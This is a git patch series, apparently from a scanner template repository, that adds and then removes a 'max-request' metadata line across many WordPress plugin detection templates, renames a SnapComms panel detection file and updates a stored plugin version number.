a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 8699f807300f664d3c8e0ced8268519b7269ff61 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 4 Sep 2023 08:46:58 +0530 Subject: [PATCH 0101/1090] Update and rename snapcomms-content-manager-panel.yaml to snapcomms-panel.yaml --- ...apcomms-content-manager-panel.yaml => snapcomms-panel.yaml} | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) rename http/exposed-panels/{snapcomms-content-manager-panel.yaml => snapcomms-panel.yaml} (90%) diff --git a/http/exposed-panels/snapcomms-content-manager-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml similarity index 90% rename from http/exposed-panels/snapcomms-content-manager-panel.yaml rename to http/exposed-panels/snapcomms-panel.yaml index 004e5434a6..9aff3761c8 100644 --- a/http/exposed-panels/snapcomms-content-manager-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -1,4 +1,4 @@ -id: snapcomms-content-manager-panel +id: snapcomms-panel info: name: SnapComms Content Manager Panel - Detect @@ -24,7 +24,6 @@ http: part: body words: - ' SnapComms Content Manager' - case-insensitive: true - type: status status: From 3a3659b996a430486855630dac79bfa2d1e229a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 04:02:15 +0000 Subject: [PATCH 0102/1090] Auto WordPress Plugins Update [Mon Sep 4 04:02:15 UTC 2023] :robot: --- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 1 insertion(+), 201 deletions(-) diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index db15278970..a5e4282993 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.1.8 \ No newline at end of file +1.1.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ 